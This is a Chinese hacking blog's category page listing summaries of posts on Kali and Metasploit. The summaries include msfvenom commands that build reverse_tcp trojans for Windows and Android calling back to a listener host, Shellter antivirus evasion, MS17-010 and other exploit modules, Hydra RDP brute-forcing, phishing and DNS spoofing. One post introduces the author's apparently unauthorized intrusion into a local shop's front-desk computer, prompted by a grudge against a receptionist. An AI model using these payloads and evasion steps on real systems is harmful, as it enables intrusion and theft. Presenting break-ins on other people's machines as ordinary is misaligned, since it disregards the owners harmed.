Kali/Bt5/backbox - 随笔分类 - We3sT

kali 免杀工具shellter安装以及使用

摘要：Shellter 是一款动态 shellcode 注入工具，我们可以将shellcode注入到其它程序上，从而来躲避杀毒软件的查杀。俗称为免杀官网：https://www.shellterproject.com/ 目前最新版本是7.2，主程序是.exe文件所以在windows下可以直接使用，在li 阅读全文

posted @ 2020-05-18 21:25 We3sT 阅读(12539) 评论(2) 推荐(2) 编辑

metasploit 生成木马常用命令

摘要：生成反弹木马： 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件 2. msfvenom -p android/meterpreter/revers 阅读全文

posted @ 2020-05-12 14:22 We3sT 阅读(3428) 评论(1) 推荐(0) 编辑

MSF里MS17_010利用模块笔记

摘要：1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块扫描结果这里可以看到 2,3,4这几台主机存在此漏洞！ 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 阅读全文

posted @ 2019-04-14 19:38 We3sT 阅读(1984) 评论(0) 推荐(0) 编辑

对本地某电脑专卖店前台主机的一次渗透入侵

摘要：时间过的真快，转眼就快到18年底了，然而还是没有挣到多少钱。心塞，欠了一屁股债，伤不起。最近在帮某公司做售后服务，刚没去多久，还不是很熟悉店里的情况。貌似前台小妹妹脾气不怎么好，这不让碰那不让碰的，谁叫她是老板的妹呢~哈...好多客户来修机器都被她弄跑了呀。厉害厉害...于是便有了此文... 先f 阅读全文

posted @ 2018-12-15 13:37 We3sT 阅读(1643) 评论(0) 推荐(3) 编辑

Kali Linux (XFce版本)安装后的一些设置

摘要：kali Linux的主版本自带的是Gnome桌面环境，安装后使用效率太低，不知道是不是我机器配置低的原因，在虚拟机里运行起来太慢、卡、丑啦...。所以以前都一直都在用Backbox Linux，并且backbox linux 默认的桌面环境是XFce，所以渐渐的喜欢上了XFce，昨天无聊去官网阅读全文

posted @ 2016-09-03 17:30 We3sT 阅读(13335) 评论(1) 推荐(1) 编辑

用MSF进行提权

摘要：在WEB渗透中当我们拿到webshell了，我们可以试试用MSF(metasploit)来进行提权，在MSF里meterpreter很强大的！我们先用msfvenom生成一个EXE的木马后门。然后在到MSF根据刚才配置的木马后门进行监听... 然后在把木马上传到服务器（受害者）的机器里，必须上传阅读全文

posted @ 2016-08-14 15:18 We3sT 阅读(23378) 评论(0) 推荐(0) 编辑

MS15-020漏洞测试

摘要：名称：Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020) 了解：Microsoft Windows没有正确处理DLL文件的加载，存在远程代码执行漏洞，通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞，成功利用后可导致加载任意库。Win 阅读全文

posted @ 2016-04-26 17:27 We3sT 阅读(6147) 评论(1) 推荐(1) 编辑

MS14-064 漏洞测试入侵win7

摘要：Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术，远程攻击者利用此漏洞通过构造的网站执行任意代码，影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块：exploi 阅读全文

posted @ 2016-04-25 16:30 We3sT 阅读(21732) 评论(0) 推荐(1) 编辑

初试钓鱼工具Weeman+DNS欺骗的使用

摘要：下午无聊再网上闲逛随意看了下，自己做了一次测试，目前最新的版本是1.6。Weeman是一款运行在Python环境下的钓鱼渗透测试工具但这款工具简单易用，安装简单，可伪造HTML页面等等。。。网上看了下，国内这个工具教程很少，要么教程都是重复的，而且也不是很详细。所以自己摸索了几个小时，把大致的使阅读全文

posted @ 2016-02-12 21:59 We3sT 阅读(5074) 评论(1) 推荐(2) 编辑

初试在线破解工具Hydra爆破3389服务器

摘要：hydra是一款全能的暴力破解工具，功能强大，几乎支持所有的协议，是著名黑客组织thc开发的。在Kali Linux下已经是默认安装的，于是测试爆破一下自己的一台VM虚拟机服务器。hydra还支持GUI图形界面(xhydra)，不过习惯还是命令好用。 (爆破3389端口终端登录的帐号和密码协议：阅读全文

posted @ 2016-01-29 15:11 We3sT 阅读(71494) 评论(5) 推荐(4) 编辑

原创QQ影音DLL劫持漏洞+动画实战教程

摘要：1.什么是DLLDLL(Dynamic Link Library)文件为动态链接库文件，又称“应用程序拓展”，是软件文件类型。在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。当我们执行某一个程序时，相应的DLL文件就会被调... 阅读全文

posted @ 2016-01-24 16:51 We3sT 阅读(2467) 评论(0) 推荐(0) 编辑

ettercap局域网内DNS欺骗(隔壁的哥们轻一点 ...)

摘要：笔记一：ettercap是什么？我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具，功能相信用过的朋友多多少少都知道，但这两款工具是在windows下运行的。而ettercap是在linux下运行的。其实功能都是差不多的，我称呼它为嗅探工具，ARP欺骗，DNS，劫持，中间人攻击... 阅读全文

posted @ 2015-12-13 16:49 We3sT 阅读(28641) 评论(2) 推荐(5) 编辑

MS10-046漏洞测试

摘要：这次用到MS10-046这个远程执行漏洞（Windows快捷方式LNK文件自动执行代码漏洞攻击）命令:1. msfconsole //启动MSFMetasploit2. search ms10-046 //搜索漏洞3. use windows/browser/ms10_046_shortcu... 阅读全文

posted @ 2015-11-09 17:05 We3sT 阅读(2484) 评论(1) 推荐(0) 编辑

MS12-020蓝屏攻击

摘要：MS12-020远程桌面协议RDP拒绝访问漏洞条件：受害者必须开放RDP协议开放了3389端口或者端口改了，知道对方RDP开放的对应端口。过程：MSF利用MSF显示为seems down说明目标已经被攻击。如图已经蓝屏。阅读全文

posted @ 2015-10-03 16:50 We3sT 阅读(1630) 评论(0) 推荐(0) 编辑

MSF入侵安卓手机

摘要：MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。我这里做测试的系统是Backbox linux ，这是一款网络渗透，信息安全评估系统。里边安装了许许多多的工具。其中MSF... 阅读全文

posted @ 2015-10-02 11:31 We3sT 阅读(27306) 评论(8) 推荐(4) 编辑

We3sT

明间业余网络IT爱好者、打杂工

随笔分类 - Kali/Bt5/backbox

公告